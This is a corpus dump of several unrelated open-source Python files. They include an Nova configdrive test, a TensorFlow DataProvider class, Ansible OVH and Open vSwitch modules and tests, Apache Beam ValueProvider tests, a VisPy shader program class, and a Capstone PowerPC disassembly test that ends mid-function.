def test_config_drive_required_by_image_property(self):
inst = fake_instance.fake_instance_obj(context.get_admin_context())
inst.config_drive = ''
inst.system_metadata = {
utils.SM_IMAGE_PROP_PREFIX + 'img_config_drive': 'mandatory'}
self.assertTrue(configdrive.required_by(inst))
inst.system_metadata = {
utils.SM_IMAGE_PROP_PREFIX + 'img_config_drive': 'optional'}
self.assertFalse(configdrive.required_by(inst))
@mock.patch.object(configdrive, 'required_by', return_value=False)
def test_config_drive_update_instance_required_by_false(self,
mock_required):
inst = fake_instance.fake_instance_obj(context.get_admin_context())
inst.config_drive = ''
configdrive.update_instance(inst)
self.assertEqual('', inst.config_drive)
inst.config_drive = True
configdrive.update_instance(inst)
self.assertTrue(inst.config_drive)
@mock.patch.object(configdrive, 'required_by', return_value=True)
def test_config_drive_update_instance(self, mock_required):
inst = fake_instance.fake_instance_obj(context.get_admin_context())
inst.config_drive = ''
configdrive.update_instance(inst)
self.assertTrue(inst.config_drive)
inst.config_drive = True
configdrive.update_instance(inst)
self.assertTrue(inst.config_drive)
|
meteorcloudy/tensorflow | refs/heads/master | tensorflow/contrib/slim/python/slim/data/data_provider.py | 145 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains code for the DataProvider.
A DataProvider is a class which provides some predefined data types from some
source (TFRecord, etc). The most basic function of a
data provider is the `Get` operation where one requests one or more types of
data, or 'items':
provider.get(items=['image', 'sentence', 'class'])
More concretely, a data provider (a subclass of BaseDataProvider) returns a
single tensor for each requested item (data type):
provider = MyDataProvider(...)
image, sentence, clazz = provider.get(['image', 'sentence', 'class'])
In this example, the provider `MyDataProvider` must know how to load each item.
A data provider may be written in a way that the logic necessary to map from
each item to tensor is completely encapsulated within the data_provider itself.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
class DataProvider(object):
"""Maps a list of requested data items to tensors from a data source.
All data providers must inherit from DataProvider and implement the Get
method which returns arbitrary types of data. No assumption is made about the
source of the data nor the mechanism for providing it.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, items_to_tensors, num_samples):
"""Constructs the Data Provider.
Args:
items_to_tensors: a dictionary of names to tensors.
num_samples: the number of samples in the dataset being provided.
"""
self._items_to_tensors = items_to_tensors
self._num_samples = num_samples
def get(self, items):
"""Returns a list of tensors specified by the given list of items.
The list of items is arbitrary different data providers satisfy different
lists of items. For example the Pascal VOC might accept items 'image' and
'semantics', whereas the NYUDepthV2 data provider might accept items
'image', 'depths' and 'normals'.
Args:
items: a list of strings, each of which indicate a particular data type.
Returns:
a list of tensors, whose length matches the length of `items`, where each
tensor corresponds to each item.
Raises:
ValueError: if any of the items cannot be satisfied.
"""
self._validate_items(items)
return [self._items_to_tensors[item] for item in items]
def list_items(self):
"""Returns the list of item names that can be provided by the data provider.
Returns:
a list of item names that can be passed to Get([items]).
"""
return self._items_to_tensors.keys()
def num_samples(self):
"""Returns the number of data samples in the dataset.
Returns:
a positive whole number.
"""
return self._num_samples
def _validate_items(self, items):
"""Verifies that each given item is a member of the list from ListItems().
Args:
items: a list or tuple of strings.
Raises:
ValueError: if `items` is not a tuple or list or if any of the elements of
`items` is not found in the list provided by self.ListItems().
"""
if not isinstance(items, (list, tuple)):
raise ValueError('items must be a list or tuple')
valid_items = self.list_items()
for item in items:
if item not in valid_items:
raise ValueError('Item [%s] is invalid. Valid entries include: %s' %
(item, valid_items))
|
2014cdag4/2014cdag4 | refs/heads/master | wsgi/static/Brython2.1.0-20140419-113919/Lib/_random.py | 115 | import _os
from os import urandom as _urandom
class Random:
"""Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), and setstate().
Optionally, implement a getrandbits() method so that randrange()
can cover arbitrarily large ranges.
"""
#random
#seed
#getstate
#setstate
VERSION = 3 # used by getstate/setstate
def __init__(self, x=None):
"""Initialize an instance.
Optional argument x controls seeding, as for Random.seed().
"""
self._state=x
def seed(self, a=None, version=2):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
For version 2 (the default), all of the bits are used if *a* is a str,
bytes, or bytearray. For version 1, the hash() of *a* is used instead.
If *a* is an int, all bits are used.
"""
self._state=a
self.gauss_next = None
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self._state
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
self._state=state
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
return _os.random()
def getrandbits(self, k):
"""getrandbits(k) -> x. Generates a long int with k random bits."""
if k <= 0:
raise ValueError('number of bits must be greater than zero')
if k != int(k):
raise TypeError('number of bits should be an integer')
numbytes = (k + 7) // 8 # bits / 8 and rounded up
x = int.from_bytes(_urandom(numbytes), 'big')
return x >> (numbytes * 8 - k) # trim excess bits
|
toshywoshy/ansible | refs/heads/devel | lib/ansible/modules/cloud/ovh/ovh_ip_loadbalancing_backend.py | 3 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovh_ip_loadbalancing_backend
short_description: Manage OVH IP LoadBalancing backends
description:
- Manage OVH (French European hosting provider) LoadBalancing IP backends
version_added: "2.2"
author: Pascal Heraud (@pascalheraud)
notes:
- Uses the python OVH Api U(https://github.com/ovh/python-ovh).
You have to create an application (a key and secret) with a consumer
key as described into U(https://docs.ovh.com/gb/en/customer/first-steps-with-ovh-api/)
requirements:
- ovh > 0.3.5
options:
name:
required: true
description:
- Name of the LoadBalancing internal name (ip-X.X.X.X)
backend:
required: true
description:
- The IP address of the backend to update / modify / delete
state:
default: present
choices: ['present', 'absent']
description:
- Determines whether the backend is to be created/modified
or deleted
probe:
default: 'none'
choices: ['none', 'http', 'icmp' , 'oco']
description:
- Determines the type of probe to use for this backend
weight:
default: 8
description:
- Determines the weight for this backend
endpoint:
required: true
description:
- The endpoint to use ( for instance ovh-eu)
application_key:
required: true
description:
- The applicationKey to use
application_secret:
required: true
description:
- The application secret to use
consumer_key:
required: true
description:
- The consumer key to use
timeout:
default: 120
description:
- The timeout in seconds used to wait for a task to be
completed.
'''
EXAMPLES = '''
# Adds or modify the backend '212.1.1.1' to a
# loadbalancing 'ip-1.1.1.1'
- ovh_ip_loadbalancing:
name: ip-1.1.1.1
backend: 212.1.1.1
state: present
probe: none
weight: 8
endpoint: ovh-eu
application_key: yourkey
application_secret: yoursecret
consumer_key: yourconsumerkey
# Removes a backend '212.1.1.1' from a loadbalancing 'ip-1.1.1.1'
- ovh_ip_loadbalancing:
name: ip-1.1.1.1
backend: 212.1.1.1
state: absent
endpoint: ovh-eu
application_key: yourkey
application_secret: yoursecret
consumer_key: yourconsumerkey
'''
RETURN = '''
'''
import time
try:
import ovh
import ovh.exceptions
from ovh.exceptions import APIError
HAS_OVH = True
except ImportError:
HAS_OVH = False
from ansible.module_utils.basic import AnsibleModule
def getOvhClient(ansibleModule):
endpoint = ansibleModule.params.get('endpoint')
application_key = ansibleModule.params.get('application_key')
application_secret = ansibleModule.params.get('application_secret')
consumer_key = ansibleModule.params.get('consumer_key')
return ovh.Client(
endpoint=endpoint,
application_key=application_key,
application_secret=application_secret,
consumer_key=consumer_key
)
def waitForNoTask(client, name, timeout):
currentTimeout = timeout
while len(client.get('/ip/loadBalancing/{0}/task'.format(name))) > 0:
time.sleep(1) # Delay for 1 sec
currentTimeout -= 1
if currentTimeout < 0:
return False
return True
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True),
backend=dict(required=True),
weight=dict(default=8, type='int'),
probe=dict(default='none',
choices=['none', 'http', 'icmp', 'oco']),
state=dict(default='present', choices=['present', 'absent']),
endpoint=dict(required=True),
application_key=dict(required=True, no_log=True),
application_secret=dict(required=True, no_log=True),
consumer_key=dict(required=True, no_log=True),
timeout=dict(default=120, type='int')
)
)
if not HAS_OVH:
module.fail_json(msg='ovh-api python module'
'is required to run this module ')
# Get parameters
name = module.params.get('name')
state = module.params.get('state')
backend = module.params.get('backend')
weight = module.params.get('weight')
probe = module.params.get('probe')
timeout = module.params.get('timeout')
# Connect to OVH API
client = getOvhClient(module)
# Check that the load balancing exists
try:
loadBalancings = client.get('/ip/loadBalancing')
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the list of loadBalancing, '
'check application key, secret, consumerkey and parameters. '
'Error returned by OVH api was : {0}'.format(apiError))
if name not in loadBalancings:
module.fail_json(msg='IP LoadBalancing {0} does not exist'.format(name))
# Check that no task is pending before going on
try:
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for no pending '
'tasks before executing the module '.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the list of pending tasks '
'of the loadBalancing, check application key, secret, consumerkey '
'and parameters. Error returned by OVH api was : {0}'
.format(apiError))
try:
backends = client.get('/ip/loadBalancing/{0}/backend'.format(name))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the list of backends '
'of the loadBalancing, check application key, secret, consumerkey '
'and parameters. Error returned by OVH api was : {0}'
.format(apiError))
backendExists = backend in backends
moduleChanged = False
if state == "absent":
if backendExists:
# Remove backend
try:
client.delete(
'/ip/loadBalancing/{0}/backend/{1}'.format(name, backend))
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion '
'of removing backend task'.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for deleting the backend, '
'check application key, secret, consumerkey and '
'parameters. Error returned by OVH api was : {0}'
.format(apiError))
moduleChanged = True
else:
if backendExists:
# Get properties
try:
backendProperties = client.get(
'/ip/loadBalancing/{0}/backend/{1}'.format(name, backend))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the backend properties, '
'check application key, secret, consumerkey and '
'parameters. Error returned by OVH api was : {0}'
.format(apiError))
if (backendProperties['weight'] != weight):
# Change weight
try:
client.post(
'/ip/loadBalancing/{0}/backend/{1}/setWeight'
.format(name, backend), weight=weight)
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion '
'of setWeight to backend task'
.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for updating the weight of the '
'backend, check application key, secret, consumerkey '
'and parameters. Error returned by OVH api was : {0}'
.format(apiError))
moduleChanged = True
if (backendProperties['probe'] != probe):
# Change probe
backendProperties['probe'] = probe
try:
client.put(
'/ip/loadBalancing/{0}/backend/{1}'
.format(name, backend), probe=probe)
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion of '
'setProbe to backend task'
.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for updating the probe of '
'the backend, check application key, secret, '
'consumerkey and parameters. Error returned by OVH api '
'was : {0}'
.format(apiError))
moduleChanged = True
else:
# Creates backend
try:
try:
client.post('/ip/loadBalancing/{0}/backend'.format(name),
ipBackend=backend, probe=probe, weight=weight)
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for creating the backend, check '
'application key, secret, consumerkey and parameters. '
'Error returned by OVH api was : {0}'
.format(apiError))
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion of '
'backend creation task'.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for creating the backend, check '
'application key, secret, consumerkey and parameters. '
'Error returned by OVH api was : {0}'.format(apiError))
moduleChanged = True
module.exit_json(changed=moduleChanged)
if __name__ == '__main__':
main()
|
tind/invenio-communities | refs/heads/master | invenio_communities/cli.py | 1 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Click command-line interface for communities management."""
from __future__ import absolute_import, print_function
import click
from flask_cli import with_appcontext
from invenio_db import db
from invenio_files_rest.errors import FilesException
from invenio_indexer.api import RecordIndexer
from invenio_records.api import Record
from .models import Community, InclusionRequest
from .utils import initialize_communities_bucket, save_and_validate_logo
#
# Communities management commands
#
@click.group()
def communities():
"""Management commands for Communities."""
@communities.command()
@with_appcontext
def init():
"""Initialize the communities file storage."""
try:
initialize_communities_bucket()
click.secho('Community init successful.', fg='green')
except FilesException as e:
click.secho(e.message, fg='red')
@communities.command()
@click.argument('community_id')
@click.argument('logo', type=click.File('rb'))
@with_appcontext
def addlogo(community_id, logo):
"""Add logo to the community."""
# Create the bucket
c = Community.get(community_id)
if not c:
click.secho('Community {0} does not exist.'.format(community_id),
fg='red')
return
ext = save_and_validate_logo(logo, logo.name, c.id)
c.logo_ext = ext
db.session.commit()
@communities.command()
@click.argument('community_id')
@click.argument('record_id')
@click.option('-a', '--accept', 'accept', is_flag=True, default=False)
@with_appcontext
def request(community_id, record_id, accept):
"""Request a record acceptance to a community."""
c = Community.get(community_id)
assert c is not None
record = Record.get_record(record_id)
if accept:
c.add_record(record)
record.commit()
else:
InclusionRequest.create(community=c, record=record,
notify=False)
db.session.commit()
RecordIndexer().index_by_id(record.id)
@communities.command()
@click.argument('community_id')
@click.argument('record_id')
@with_appcontext
def remove(community_id, record_id):
"""Remove a record from community."""
c = Community.get(community_id)
assert c is not None
c.remove_record(record_id)
db.session.commit()
RecordIndexer().index_by_id(record_id)
|
drmrd/ansible | refs/heads/devel | test/units/modules/network/ovs/test_openvswitch_port.py | 57 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests.mock import patch
from ansible.modules.network.ovs import openvswitch_port
from units.modules.utils import set_module_args
from .ovs_module import TestOpenVSwitchModule, load_fixture
test_name_side_effect_matrix = {
'test_openvswitch_port_absent_idempotent': [
(0, '', '')],
'test_openvswitch_port_absent_removes_port': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_idempotent': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_creates_port': [
(0, '', ''),
(0, '', ''),
(0, '', '')],
'test_openvswitch_port_present_changes_tag': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_changes_external_id': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_adds_external_id': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_clears_external_id': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_runs_set_mode': [
(0, '', ''),
(0, '', ''),
(0, '', '')],
}
class TestOpenVSwitchPortModule(TestOpenVSwitchModule):
module = openvswitch_port
def setUp(self):
super(TestOpenVSwitchPortModule, self).setUp()
self.mock_run_command = (
patch('ansible.module_utils.basic.AnsibleModule.run_command'))
self.run_command = self.mock_run_command.start()
self.mock_get_bin_path = (
patch('ansible.module_utils.basic.AnsibleModule.get_bin_path'))
self.get_bin_path = self.mock_get_bin_path.start()
def tearDown(self):
super(TestOpenVSwitchPortModule, self).tearDown()
self.mock_run_command.stop()
self.mock_get_bin_path.stop()
def load_fixtures(self, test_name):
test_side_effects = []
for s in test_name_side_effect_matrix[test_name]:
rc = s[0]
out = s[1] if s[1] == '' else str(load_fixture(s[1]))
err = s[2]
side_effect_with_fixture_loaded = (rc, out, err)
test_side_effects.append(side_effect_with_fixture_loaded)
self.run_command.side_effect = test_side_effects
self.get_bin_path.return_value = '/usr/bin/ovs-vsctl'
def test_openvswitch_port_absent_idempotent(self):
set_module_args(dict(state='absent',
bridge='test-br',
port='eth2'))
self.execute_module(test_name='test_openvswitch_port_absent_idempotent')
def test_openvswitch_port_absent_removes_port(self):
set_module_args(dict(state='absent',
bridge='test-br',
port='eth2'))
commands = [
'/usr/bin/ovs-vsctl -t 5 del-port test-br eth2',
]
self.execute_module(changed=True, commands=commands,
test_name='test_openvswitch_port_absent_removes_port')
def test_openvswitch_port_present_idempotent(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'bar'}))
self.execute_module(test_name='test_openvswitch_port_present_idempotent')
def test_openvswitch_port_present_creates_port(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'bar'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 add-port test-br eth2 tag=10',
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo=bar'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_creates_port')
def test_openvswitch_port_present_changes_tag(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=20,
external_ids={'foo': 'bar'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 set port eth2 tag=20'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_changes_tag')
def test_openvswitch_port_present_changes_external_id(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'baz'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo=baz'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_changes_external_id')
def test_openvswitch_port_present_adds_external_id(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo2': 'bar2'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo2=bar2'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_adds_external_id')
def test_openvswitch_port_present_clears_external_id(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': None}))
commands = [
'/usr/bin/ovs-vsctl -t 5 remove port eth2 external_ids foo'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_clears_external_id')
def test_openvswitch_port_present_runs_set_mode(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'bar'},
set="port eth2 other_config:stp-path-cost=10"))
commands = [
'/usr/bin/ovs-vsctl -t 5 add-port test-br eth2 tag=10 -- set'
' port eth2 other_config:stp-path-cost=10',
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo=bar'
]
self.execute_module(changed=True, commands=commands,
test_name='test_openvswitch_port_present_runs_set_mode')
|
vikkyrk/incubator-beam | refs/heads/master | sdks/python/apache_beam/utils/value_provider_test.py | 2 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for the ValueProvider class."""
import unittest
from apache_beam.utils.pipeline_options import PipelineOptions
from apache_beam.utils.value_provider import RuntimeValueProvider
from apache_beam.utils.value_provider import StaticValueProvider
class ValueProviderTests(unittest.TestCase):
def test_static_value_provider_keyword_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
help='This keyword argument is a value provider',
default='some value')
options = UserDefinedOptions(['--vp_arg', 'abc'])
self.assertTrue(isinstance(options.vp_arg, StaticValueProvider))
self.assertTrue(options.vp_arg.is_accessible())
self.assertEqual(options.vp_arg.get(), 'abc')
def test_runtime_value_provider_keyword_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
help='This keyword argument is a value provider')
options = UserDefinedOptions()
self.assertTrue(isinstance(options.vp_arg, RuntimeValueProvider))
self.assertFalse(options.vp_arg.is_accessible())
with self.assertRaises(RuntimeError):
options.vp_arg.get()
def test_static_value_provider_positional_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'vp_pos_arg',
help='This positional argument is a value provider',
default='some value')
options = UserDefinedOptions(['abc'])
self.assertTrue(isinstance(options.vp_pos_arg, StaticValueProvider))
self.assertTrue(options.vp_pos_arg.is_accessible())
self.assertEqual(options.vp_pos_arg.get(), 'abc')
def test_runtime_value_provider_positional_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'vp_pos_arg',
help='This positional argument is a value provider')
options = UserDefinedOptions([])
self.assertTrue(isinstance(options.vp_pos_arg, RuntimeValueProvider))
self.assertFalse(options.vp_pos_arg.is_accessible())
with self.assertRaises(RuntimeError):
options.vp_pos_arg.get()
def test_static_value_provider_type_cast(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
type=int,
help='This flag is a value provider')
options = UserDefinedOptions(['--vp_arg', '123'])
self.assertTrue(isinstance(options.vp_arg, StaticValueProvider))
self.assertTrue(options.vp_arg.is_accessible())
self.assertEqual(options.vp_arg.get(), 123)
def test_set_runtime_option(self):
# define ValueProvider ptions, with and without default values
class UserDefinedOptions1(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
help='This keyword argument is a value provider') # set at runtime
parser.add_value_provider_argument( # not set, had default int
'-v', '--vp_arg2', # with short form
default=123,
type=int)
parser.add_value_provider_argument( # not set, had default str
'--vp-arg3', # with dash in name
default='123',
type=str)
parser.add_value_provider_argument( # not set and no default
'--vp_arg4',
type=float)
parser.add_value_provider_argument( # positional argument set
'vp_pos_arg', # default & runtime ignored
help='This positional argument is a value provider',
type=float,
default=5.4)
# provide values at graph-construction time
# (options not provided here become of the type RuntimeValueProvider)
options = UserDefinedOptions1(['1.2'])
self.assertFalse(options.vp_arg.is_accessible())
self.assertFalse(options.vp_arg2.is_accessible())
self.assertFalse(options.vp_arg3.is_accessible())
self.assertFalse(options.vp_arg4.is_accessible())
self.assertTrue(options.vp_pos_arg.is_accessible())
# provide values at job-execution time
# (options not provided here will use their default, if they have one)
RuntimeValueProvider.set_runtime_options({'vp_arg': 'abc',
'vp_pos_arg':'3.2'})
self.assertTrue(options.vp_arg.is_accessible())
self.assertEqual(options.vp_arg.get(), 'abc')
self.assertTrue(options.vp_arg2.is_accessible())
self.assertEqual(options.vp_arg2.get(), 123)
self.assertTrue(options.vp_arg3.is_accessible())
self.assertEqual(options.vp_arg3.get(), '123')
self.assertTrue(options.vp_arg4.is_accessible())
self.assertIsNone(options.vp_arg4.get())
self.assertTrue(options.vp_pos_arg.is_accessible())
self.assertEqual(options.vp_pos_arg.get(), 1.2)
|
sh4wn/vispy | refs/heads/master | vispy/visuals/shaders/program.py | 20 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
from __future__ import division
import logging
from ...gloo import Program
from ...gloo.preprocessor import preprocess
from ...util import logger
from ...util.event import EventEmitter
from .function import MainFunction
from .variable import Variable
from .compiler import Compiler
class ModularProgram(Program):
"""
Shader program using Function instances as basis for its shaders.
Automatically rebuilds program when functions have changed and uploads
program variables.
"""
def __init__(self, vcode='', fcode=''):
Program.__init__(self)
self.changed = EventEmitter(source=self, type='program_change')
# Cache state of Variables so we know which ones require update
self._variable_state = {}
self._vert = MainFunction('')
self._frag = MainFunction('')
self._vert._dependents[self] = None
self._frag._dependents[self] = None
self.vert = vcode
self.frag = fcode
@property
def vert(self):
return self._vert
@vert.setter
def vert(self, vcode):
vcode = preprocess(vcode)
self._vert.code = vcode
self._need_build = True
self.changed(code_changed=True, value_changed=False)
@property
def frag(self):
return self._frag
@frag.setter
def frag(self, fcode):
fcode = preprocess(fcode)
self._frag.code = fcode
self._need_build = True
self.changed(code_changed=True, value_changed=False)
def _dep_changed(self, dep, code_changed=False, value_changed=False):
if code_changed and logger.level <= logging.DEBUG:
import traceback
logger.debug("ModularProgram changed: %s source=%s, values=%s",
self, code_changed, value_changed)
traceback.print_stack()
if code_changed:
self._need_build = True
self.changed(code_changed=code_changed,
value_changed=value_changed)
def draw(self, *args, **kwargs):
self.build_if_needed()
Program.draw(self, *args, **kwargs)
def build_if_needed(self):
""" Reset shader source if necesssary.
"""
if self._need_build:
self._build()
self._need_build = False
self.update_variables()
def _build(self):
logger.debug("Rebuild ModularProgram: %s", self)
self.compiler = Compiler(vert=self.vert, frag=self.frag)
code = self.compiler.compile()
self.set_shaders(code['vert'], code['frag'])
logger.debug('==== Vertex Shader ====\n\n%s\n', code['vert'])
logger.debug('==== Fragment shader ====\n\n%s\n', code['frag'])
# Note: No need to reset _variable_state, gloo.Program resends
# attribute/uniform data on setting shaders
def update_variables(self):
# Clear any variables that we may have set another time.
# Otherwise we get lots of warnings.
self._pending_variables = {}
# set all variables
settable_vars = 'attribute', 'uniform'
logger.debug("Apply variables:")
deps = self.vert.dependencies() + self.frag.dependencies()
for dep in deps:
if not isinstance(dep, Variable) or dep.vtype not in settable_vars:
continue
name = self.compiler[dep]
state_id = dep.state_id
if self._variable_state.get(name, None) != state_id:
self[name] = dep.value
self._variable_state[name] = state_id
logger.debug(" %s = %s **", name, dep.value)
else:
logger.debug(" %s = %s", name, dep.value)
|
ericzolf/ansible | refs/heads/devel | test/integration/targets/delegate_to/library/detect_interpreter.py | 40 | #!/usr/bin/python
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import sys
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(argument_spec={})
module.exit_json(**dict(found=sys.executable))
if __name__ == '__main__':
main()
|
capturePointer/capstone | refs/heads/master | bindings/python/test_ppc.py | 33 | #!/usr/bin/env python
# Capstone Python bindings, by Nguyen Anh Quynnh <aquynh@gmail.com>
from __future__ import print_function
from capstone import *
from capstone.ppc import *
from xprint import to_x, to_hex, to_x_32
PPC_CODE = b"\x43\x20\x0c\x07\x41\x56\xff\x17\x80\x20\x00\x00\x80\x3f\x00\x00\x10\x43\x23\x0e\xd0\x44\x00\x80\x4c\x43\x22\x02\x2d\x03\x00\x80\x7c\x43\x20\x14\x7c\x43\x20\x93\x4f\x20\x00\x21\x4c\xc8\x00\x21\x40\x82\x00\x14"
all_tests = (
(CS_ARCH_PPC, CS_MODE_BIG_ENDIAN, PPC_CODE, "PPC-64"),
)
def print_insn_detail(insn):
# print address, mnemonic and operands
print("0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))
# "data" instruction generated by SKIPDATA option has no detail
if insn.id == 0:
return
if len(insn.operands) > 0:
print("\top_count: %u" % len(insn.operands))
c = 0
for i in insn.operands:
if i.type == PPC_OP_REG:
print("\t\toperands[%u].type: REG = %s" % (c, insn.reg_name(i.reg)))
if i.type == PPC_OP_IMM:
print("\t\toperands[%u].type: IMM = 0x%s" % (c, to_x_32(i.imm)))
if i.type == PPC_OP_MEM:
print("\t\toperands[%u].type: MEM" % c)
if i.mem.base != 0:
print("\t\t\toperands[%u].mem.base: REG = %s" \
% (c, insn.reg_name(i.mem.base)))
if i.mem.disp != 0:
print("\t\t\toperands[%u].mem.disp: 0x%s" \
% (c, to_x_32(i.mem.disp)))
if i.type == PPC_OP_CRX:
print("\t\toperands[%u].type: CRX" % c)
